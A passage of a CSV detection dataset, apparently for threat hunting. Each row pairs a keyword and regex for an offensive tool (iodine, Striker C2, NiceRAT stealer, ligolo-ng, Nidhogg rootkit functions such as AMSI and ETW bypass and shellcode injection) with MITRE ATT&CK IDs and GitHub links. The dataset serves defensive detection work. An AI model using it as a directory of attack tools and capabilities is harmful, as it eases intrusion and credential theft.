"*nfxwi0lomv0gk21unfxgo3dfon0gs1th*",".{0,1000}nfxwi0lomv0gk21unfxgo3dfon0gs1th.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*nginx/striker.log*",".{0,1000}nginx\/striker\.log.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","0","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*-nh 127.0.0.1 -nP 7687 -nu neo4j -np *",".{0,1000}\-nh\s127\.0\.0\.1\s\-nP\s7687\s\-nu\sneo4j\s\-np\s.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","2","156","16","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" "*nheiniger/SnaffPoint*",".{0,1000}nheiniger\/SnaffPoint.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*niam/noitcetorP-repmaT-ssapyB*",".{0,1000}niam\/noitcetorP\-repmaT\-ssapyB.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*NiceRAT | * Stealer*",".{0,1000}NiceRAT\s\|\s.{0,1000}\s\sStealer.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*NiceRAT-main.zip*",".{0,1000}NiceRAT\-main\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","1","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Nick Swink aka c0rnbread*",".{0,1000}Nick\sSwink\saka\sc0rnbread.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","AD Enumeration","7","5","465","44","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z" "*nickvourd/COM-Hunter*",".{0,1000}nickvourd\/COM\-Hunter.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","10","3","241","46","2024-03-10T11:00:11Z","2022-05-26T19:34:59Z" "*nickvourd/Supernova*",".{0,1000}nickvourd\/Supernova.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tools","https://github.com/nickvourd/Supernova","1","1","N/A","10","6","573","100","2024-04-30T14:35:29Z","2023-08-08T11:30:34Z" "*nickzer0/RagingRotator*",".{0,1000}nickzer0\/RagingRotator.{0,1000}","offensive_tool_keyword","RagingRotator","A tool for carrying out brute force attacks against Office 365 with built in IP rotation use AWS gateways.","T1110 - T1027 - T1071 - T1090","TA0006 - TA0005 - TA0001","N/A","N/A","Credential Access","https://github.com/nickzer0/RagingRotator","1","1","N/A","10","1","74","5","2024-02-05T21:46:54Z","2023-09-01T15:19:38Z" "*nicocha30/ligolo-ng*",".{0,1000}nicocha30\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*nicocha30/ligolo-ng*",".{0,1000}nicocha30\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","N/A","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","10","10","2156","226","2024-04-26T01:27:05Z","2021-07-28T12:55:36Z" "*Nidhogg rootkit*",".{0,1000}Nidhogg\srootkit.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg*AntiAnalysis.hpp*",".{0,1000}Nidhogg.{0,1000}AntiAnalysis\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggDisableCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggDisableCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggEnableDisableEtwTi*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggEnableDisableEtwTi.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggListObCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListObCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggListPsRoutines*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListPsRoutines.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggListRegistryCallbacks*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggListRegistryCallbacks.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::AntiAnalysis::NidhoggRestoreCallback*",".{0,1000}Nidhogg\:\:AntiAnalysis\:\:NidhoggRestoreCallback.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggFileClearAllProtection*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggFileProtect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileProtect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggFileUnprotect*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggFileUnprotect.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::FileUtils::NidhoggQueryFiles*",".{0,1000}Nidhogg\:\:FileUtils\:\:NidhoggQueryFiles.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggAmsiBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggAmsiBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggETWBypass*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggETWBypass.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggInjectDll*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectDll.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggInjectShellcode*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggInjectShellcode.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggPatchModule*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggPatchModule.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggReadData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggReadData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ModuleUtils::NidhoggWriteData*",".{0,1000}Nidhogg\:\:ModuleUtils\:\:NidhoggWriteData.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*Nidhogg::ProcessUtils::NidhoggProcessClearAllProtection*",".{0,1000}Nidhogg\:\:ProcessUtils\:\:NidhoggProcessClearAllProtection.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - 